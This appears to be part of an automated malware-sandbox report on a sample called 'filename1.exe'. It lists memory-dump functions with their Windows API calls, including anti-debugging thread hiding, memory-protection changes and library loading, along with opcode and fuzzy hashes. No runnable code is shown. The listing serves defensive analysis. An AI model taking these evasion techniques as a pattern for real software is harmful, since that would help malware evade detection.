Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 4236f806d8678f8f20859c60b90036b27a5cafad39232650df14008542a38140
Instruction ID: 1b03fe53faddb3c8a317e547d4ce4556c69d787922ac8e342b2409b4972014ed
Opcode Fuzzy Hash: 4236f806d8678f8f20859c60b90036b27a5cafad39232650df14008542a38140
Instruction Fuzzy Hash: 10E0CD78508301B7D2456B308899B9A6E997FE5700F208D0CF6C6D7061C733C455DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0056483A, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 834184558b10af734d210c6554a713b27b29ccde3323d836bdf20e1967c48b35
Instruction ID: 3a4b5942c68245317a6ad9b63aeab540113303c96aee736cda12e7186c515574
Opcode Fuzzy Hash: 834184558b10af734d210c6554a713b27b29ccde3323d836bdf20e1967c48b35
Instruction Fuzzy Hash: F2D02E0840028063C3033B3440AC3CEAA933FC6B10F620A7CE892AB033CBA3C10ECB81

Uniqueness

Uniqueness Score: -1.00%

Function 00564826, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,005657DA,005623CE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00564850

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da1444af0a0e4cb31055f0a1f395ff1554aae7929104cf55f09279609698fca9
Instruction ID: 59b44fbbacdd69a794a0028a0b1d0ef222f4ac1e8b4c58d72ff0366c2150646c
Opcode Fuzzy Hash: da1444af0a0e4cb31055f0a1f395ff1554aae7929104cf55f09279609698fca9
Instruction Fuzzy Hash: 3DD017446482A4A3C3023F7454683DEAE923FDAB10FA10A79E8A297022D797C509AA46

Uniqueness

Uniqueness Score: -1.00%

Function 00562E63, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00562E39), ref: 00562E96

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1f9223e50ba9faf4a76e344332579708a4fb2b7253e93c40bcfa5676bb73c2fb
Instruction ID: f8689f62a7d6d14a4219f500cf287ee604d6a82badbaafa050eb692efbba9bab
Opcode Fuzzy Hash: 1f9223e50ba9faf4a76e344332579708a4fb2b7253e93c40bcfa5676bb73c2fb
Instruction Fuzzy Hash: A2D02234BE4305B3FB3045204D26FF2520AABD0F01F50820ABF8A290C0A7F24840C202

Uniqueness

Uniqueness Score: -1.00%

Function 00562E76, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00562E39), ref: 00562E96

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5493485b07e94442d0667f433c44773a86b937e8985a9b905d587f7f821dc3c7
Instruction ID: e01e3f48dc8da8c91e1eac3d66a9d05c835116a166dc0d827a3d6c73afa0ca1e
Opcode Fuzzy Hash: 5493485b07e94442d0667f433c44773a86b937e8985a9b905d587f7f821dc3c7
Instruction Fuzzy Hash: 48D0A92486170473F7325A300C28FC661436FE0B00F42021DAF96680E286A38000C285

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00562387, Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43c2d415152ca9a4151d98aecf0b044bd8a96e2753e07a3f04aba038363d0c54
Instruction ID: bceb74b1cb055f1f1534d7b1491800bbd59c9bb492f2cbf6298abf5043bf3850
Opcode Fuzzy Hash: 43c2d415152ca9a4151d98aecf0b044bd8a96e2753e07a3f04aba038363d0c54
Instruction Fuzzy Hash: E8A1047434070AAFEB215F24CD56BEA3E62FF95340F604528FE859B2C1C7B998C49B45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: filename1.exe PID: 5516 Parent PID: 5936 filename1.exeCOMMON

Executed Functions

Function 00560754, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 466COMMON

Download Yara Rule

Strings

1685, xrefs: 00562F46
W.E, xrefs: 00563A1D
1685, xrefs: 00562F30

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: W.E$1685$1685
API String ID: 1029625771-3493866093
Opcode ID: 95f2295cb54c6105c2c143e9197155f34be52aeb17c7c4599629db3bd4875062
Instruction ID: bdb2b65bf9e00ab94a4610f0e4f16b337ee7f9a64faa88bef248e9946f99789f
Opcode Fuzzy Hash: 95f2295cb54c6105c2c143e9197155f34be52aeb17c7c4599629db3bd4875062
Instruction Fuzzy Hash: C1E1CB70604306AAEB346A608D997FF2F67BF92390F65492EEC86571D2D735C881C712

Uniqueness

Uniqueness Score: -1.00%

Function 0056506E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

`, xrefs: 0056513D
1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T$`
API String ID: 4046476035-3057540238
Opcode ID: 8569709f0e9abda6388dae55a8c2ec7b05ed10818d16b92ef7c257d54f5134f9
Instruction ID: 848b1bbe085a265996dbdb3219c49190b273edfd08668604a301747d62490f24
Opcode Fuzzy Hash: 8569709f0e9abda6388dae55a8c2ec7b05ed10818d16b92ef7c257d54f5134f9
Instruction Fuzzy Hash: 8A414A70644B0A99EF205E348D697EB2F96BF837A0FA00316ED56171C1F775C885CA52

Uniqueness

Uniqueness Score: -1.00%

Function 00560500, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056057A,?,00000000,?,00563FAF,?), ref: 0056051A
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: 10eb6f460f11ccece8ddb1c7845f42fdbd4de332b4298a32e2fdd794612e3f60
Instruction ID: 06e13dd510f4a5991afd6e9efd2f3eedcfc912d0a9f01a00e185f6bab88dce7b
Opcode Fuzzy Hash: 10eb6f460f11ccece8ddb1c7845f42fdbd4de332b4298a32e2fdd794612e3f60
Instruction Fuzzy Hash: 4231797034430AAEFF10AE348DA57FB2E95FF863A4F20562AFD535B1C0EB60C8418A11

Uniqueness

Uniqueness Score: -1.00%

Function 00566569, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Part of subcall function 00561ED8: Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Strings

B, xrefs: 005665AA
1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationSleepThread
String ID: 1.!T$B
API String ID: 1275441292-2905255708
Opcode ID: d38730baf135e8cf5f298a5e1b968fc3e46f693ce868ffad907be234c6d859ba
Instruction ID: 88275198b56b14a4215253c062f99733bb24a54c0b7c581942ce09f7b3a8ff90
Opcode Fuzzy Hash: d38730baf135e8cf5f298a5e1b968fc3e46f693ce868ffad907be234c6d859ba
Instruction Fuzzy Hash: F0319E7034070A99FF106E748DA57EB2E95BF867A0FA00726FD536B2C1EB60C8418A11

Uniqueness

Uniqueness Score: -1.00%

Function 00565787, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: 1.!T
API String ID: 3389902171-3147410236
Opcode ID: 936cc3911ff8acfeca065e6ee70e861bd86ec5c3de48da688220c8374b51d257
Instruction ID: 5d30ef3fbcd4d749e2b924bc055ba21b7a69eec3c9d76eed26b4b6cbdeaced00
Opcode Fuzzy Hash: 936cc3911ff8acfeca065e6ee70e861bd86ec5c3de48da688220c8374b51d257
Instruction Fuzzy Hash: 32D11C30684B46DEDF219F2889D47AA7F91BF56360F648769DC974F2D6E3308882C712

Uniqueness

Uniqueness Score: -1.00%

Function 00560586, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 005646B0: LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: d1d26b25d57c68eaf52d42535a53b334740d8d45e921ea37fcef6dd9e624c0e2
Instruction ID: 390ce5611135f7d6c8fc89f74817cfc72ee76ecc41332743299b527ae156f872
Opcode Fuzzy Hash: d1d26b25d57c68eaf52d42535a53b334740d8d45e921ea37fcef6dd9e624c0e2
Instruction Fuzzy Hash: A9317C7024470AAAFF116E348D653EB2FD5BF86764F60072AFD936B1C2D761C842CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00560D13, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,?,00000004,00000000), ref: 00560D80

Strings

W.E, xrefs: 00563A1D

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: W.E
API String ID: 2706961497-3845452836
Opcode ID: 2964555d8f9f5ded7363585f0627ed7d85936338fba35935d043473cb3f19004
Instruction ID: 76ca1d50b171286853167ffb61413f9ac73cbaa45c67900a7bffe00a60041b47
Opcode Fuzzy Hash: 2964555d8f9f5ded7363585f0627ed7d85936338fba35935d043473cb3f19004
Instruction Fuzzy Hash: 4A3177B2204345ABDB21AA508C4ABF73F29FF46394F6A0629F941672D2C3759880C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00560D28, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,?,00000004,00000000), ref: 00560D80

Strings

W.E, xrefs: 00563A1D

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: W.E
API String ID: 2706961497-3845452836
Opcode ID: 1cb79fa4eabea40fb886034657fb964aca7d22ef89afea7d5136974e97fbd8ca
Instruction ID: 41ceeb440ca0ca1376bc96ea9cc159a0e7d390b61707c37ff925691d4b64861f
Opcode Fuzzy Hash: 1cb79fa4eabea40fb886034657fb964aca7d22ef89afea7d5136974e97fbd8ca
Instruction Fuzzy Hash: ED318C71104341ABDB22AB608C497E73F35FF46344F2A062DF881671E3C3769881C71A

Uniqueness

Uniqueness Score: -1.00%

Function 00564F76, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 172e9497aae570b266f9b81e81fe915f6f1098f77578c4ba1742f880ddb439e1
Instruction ID: b2ca869806c9539cecef7e7e5e212d0aef0b501cc425a29d643541bd23e7d24d
Opcode Fuzzy Hash: 172e9497aae570b266f9b81e81fe915f6f1098f77578c4ba1742f880ddb439e1
Instruction Fuzzy Hash: 4B31AF7034070BA9FF106E348D657EB2E95BF867A4F60032AFE532B2C1E760C8418A51

Uniqueness

Uniqueness Score: -1.00%

Function 00560DA8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,?,00000004,00000000), ref: 00560D80

Strings

W.E, xrefs: 00563A1D

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: W.E
API String ID: 2706961497-3845452836
Opcode ID: 17f88f2b7617d368fab1a1db0c9983c40a22e541129ebdcc755abbce9dfc2196
Instruction ID: 86e723cb15fd73dcb0d0dc5254d381e2cd94ce4533e5995340b5e17327a8d56e
Opcode Fuzzy Hash: 17f88f2b7617d368fab1a1db0c9983c40a22e541129ebdcc755abbce9dfc2196
Instruction Fuzzy Hash: A6315B71104281ABDB32AB648C09BE73F25FF46354F2A076DF891671D2C7729881C706

Uniqueness

Uniqueness Score: -1.00%

Function 00560D56, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,?,00000004,00000000), ref: 00560D80

Strings

W.E, xrefs: 00563A1D

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: W.E
API String ID: 2706961497-3845452836
Opcode ID: 9bd4e70c44ae8884165ab65ff5f2366c2221628611e13bc9e5a65351ddc935b4
Instruction ID: ad2fe22421525e6ea284aa0a9b9835698391bb7bed26c51ee4979c37ad6b34a2
Opcode Fuzzy Hash: 9bd4e70c44ae8884165ab65ff5f2366c2221628611e13bc9e5a65351ddc935b4
Instruction Fuzzy Hash: 22319C71104340ABDB21AB608C49BE73F36FF85744F6A062DF895671E2C7739881C70A

Uniqueness

Uniqueness Score: -1.00%

Function 005605CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 005646B0: LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 3e1ec997202d81e70b2b182d9fabcb6a15a0dd842c6eda5654c85f5db0e0a3a3
Instruction ID: 0ed724b76066769662769bf83113c63a8023646d3522e9c1cecabba714e958d2
Opcode Fuzzy Hash: 3e1ec997202d81e70b2b182d9fabcb6a15a0dd842c6eda5654c85f5db0e0a3a3
Instruction Fuzzy Hash: EB317C7024470ABAFF116E348CA57EB2F91BF85794F600319FD922B1C1D7A1C841CA51

Uniqueness

Uniqueness Score: -1.00%

Function 005605F2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 005646B0: LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: b631f00bf4fe635f61dfa564feb826f0577bf2dd0a706205d20539b8a5471a74
Instruction ID: 84354fbcc3221e21c84c3fa1f2755f5dc8b705ec30cbfc14e5114b893893112e
Opcode Fuzzy Hash: b631f00bf4fe635f61dfa564feb826f0577bf2dd0a706205d20539b8a5471a74
Instruction Fuzzy Hash: E521AF7034470ABAFF216E348CA57DB2E91BF85BA4F600329FD922B1D1E792C841CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00560664, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: daf9cd4abffb4183deb69bf840522f51e8f3836ab7eab8fc33528ebde30ec5a7
Instruction ID: 50546ddb38a8b7acdb75d3604194d5521114295d625d0bcb51c60bf38391f8c0
Opcode Fuzzy Hash: daf9cd4abffb4183deb69bf840522f51e8f3836ab7eab8fc33528ebde30ec5a7
Instruction Fuzzy Hash: E7217970244B4AAAEF11AF748C553DB3F91BF863A4F640315FDA21B1D2DB61C442CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0056062B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 005646B0: LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: e4484f4d5562a7e4a8f76d59ece35591fe07ce0076f5e3605736d6cb810b51a9
Instruction ID: e0a8eb3fa1890f3c18f9d5a48e53d85a3e84d0448706a528e9a660e9046384a4
Opcode Fuzzy Hash: e4484f4d5562a7e4a8f76d59ece35591fe07ce0076f5e3605736d6cb810b51a9
Instruction Fuzzy Hash: 59115CB024471AABEF11AE348C953DB2F91BF86794F600319FCA22B2D1D762C542CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00560698, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Strings

1.!T, xrefs: 00560651

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 289d049e71f410eba3fa5b70f2a0597a705c7f4861288788d361300c3ceed76b
Instruction ID: 4aed25f04b4cb0e11b24c097f30efafc72291af4eb6bb219a16be2ffa34f20c9
Opcode Fuzzy Hash: 289d049e71f410eba3fa5b70f2a0597a705c7f4861288788d361300c3ceed76b
Instruction Fuzzy Hash: A811BAB024431AAAFF225F348C957D73F91BF863A8F200315FC922B2C1CB61D801CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00561ED8, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 120sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Strings

B, xrefs: 005665AA

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: B
API String ID: 3472027048-3806887055
Opcode ID: 66b92bb7252c61cc3447767968f10169e865033689dafb4a70a4d83c43e1d655
Instruction ID: 80d06ae634d4bf980f9f60016430a908c4096c2a1a3a6d771bdd9aed8fb7b4db
Opcode Fuzzy Hash: 66b92bb7252c61cc3447767968f10169e865033689dafb4a70a4d83c43e1d655
Instruction Fuzzy Hash: 0A413470240B02EFE724AF24C85ABF97BA1BF14750F644908FC869B1E2D775C884CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00564700, Relevance: 1.7, APIs: 1, Instructions: 210libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4241aae7701cec4369a26c54a55202d33632444b33ca47ef07b0ac71011d44d8
Instruction ID: c4e3efb6e1c2d60ef3f18f737cb5ca00ccd5de9b90066077b1fe6e074cb0b93e
Opcode Fuzzy Hash: 4241aae7701cec4369a26c54a55202d33632444b33ca47ef07b0ac71011d44d8
Instruction Fuzzy Hash: 2C6115550087D697C3234B3885547BA6F927FA3729F680B9DCCE3471F2D74385869A82

Uniqueness

Uniqueness Score: -1.00%

Function 00565D24, Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e7d423da0a4f687034173d408db56462d63e7b938a749a4bf725f85f5ddf35
Instruction ID: 03c3bb6b2abcddf5a5f263883952472ea98cc638b1001ba18a9a4f04a54137c7
Opcode Fuzzy Hash: 96e7d423da0a4f687034173d408db56462d63e7b938a749a4bf725f85f5ddf35
Instruction Fuzzy Hash: 6A4135A015CBD02FE7099734CC89F363FA8EB97315F2941DEE182C71A3E455AC468321

Uniqueness

Uniqueness Score: -1.00%

Function 0056621C, Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff2792ef8a5086950e6831632afa1cdd812b6e198d784f91f4cd4babef5544d
Instruction ID: 6bec8fb6a0c87b77d1e2328e8fc2195f42b8744ef23330f3127b4ff423fda0fb
Opcode Fuzzy Hash: 1ff2792ef8a5086950e6831632afa1cdd812b6e198d784f91f4cd4babef5544d
Instruction Fuzzy Hash: 29410634608641DFDF264A78C46D3B13F527F62318FE84E5AC883471A6C36684CADB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661B8, Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b404289c5f2cd3ce3540d7200563106b31d736238dad7f9332becb1d32039f50
Instruction ID: cb923e8f45bc566579479da5851766096568eeb5b423bfc8b526b7b199c2d2ff
Opcode Fuzzy Hash: b404289c5f2cd3ce3540d7200563106b31d736238dad7f9332becb1d32039f50
Instruction Fuzzy Hash: 6F411434608141DFDF354A68C4AA3F12F927F62318FE84D1BC883471A6D76684CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 00566280, Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de41e6092b946871bd0379e74915fe8ec6b4b1dc754988cf4a01bca4e635f12
Instruction ID: 32bc445b538ec01f0b2bd4a3da05d13a9d9b70ff7bb5a5e5aa1a1fde8957cc4a
Opcode Fuzzy Hash: 6de41e6092b946871bd0379e74915fe8ec6b4b1dc754988cf4a01bca4e635f12
Instruction Fuzzy Hash: 1641F434608286CFDF354A78C46D7B17FA27F62318FE84E4AC893471A6C76684C9DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0056616E, Relevance: 1.6, APIs: 1, Instructions: 141nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: a73fad3d2aef8fc2037dccafcfe59bc0f90a808c961593f69bf339c56e9cc4cb
Instruction ID: c357d8236231f740371254066a38d37e92463c915df00aeedaa731c6f5a96dd4
Opcode Fuzzy Hash: a73fad3d2aef8fc2037dccafcfe59bc0f90a808c961593f69bf339c56e9cc4cb
Instruction Fuzzy Hash: 3341C134608105DFEF394A68C5AE3F02F52BF62319FE84D17C84347199D36984CAEA53

Uniqueness

Uniqueness Score: -1.00%

Function 00566174, Relevance: 1.6, APIs: 1, Instructions: 140nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566543

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 76ba761cbcc7439630c06e3378bbca11c26389f6cba55899092a2086dffad900
Instruction ID: 495f8a703e3255590483233d3d0388f5af4db1009a37b6757c7e54ff65781df7
Opcode Fuzzy Hash: 76ba761cbcc7439630c06e3378bbca11c26389f6cba55899092a2086dffad900
Instruction Fuzzy Hash: CF41D034608101DFDF394A68C4AA3F12F52BF62319FE84D1BC84347199D76688CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 005661E8, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9424389e19bcb03dece0483913cd34d7687a17cd793e2feced578325bcb730
Instruction ID: ff6498ebd8d4dc5c0ee27728c8cf3be9496f9a53b9a9fcf534d046c9d9c844cd
Opcode Fuzzy Hash: de9424389e19bcb03dece0483913cd34d7687a17cd793e2feced578325bcb730
Instruction Fuzzy Hash: 1A41DE34608241DFDF354A68C4AA3F52F92BF62318FE84D5BC84347199D36688CAEB53

Uniqueness

Uniqueness Score: -1.00%

Function 0056618C, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d54a0856f20cf99d903472e2fcdbee84954223481e5c82593ff812831941a00
Instruction ID: a300384cda7cc796a408f41f47452e414653e0637c0385dfa84c5c33d1a15788
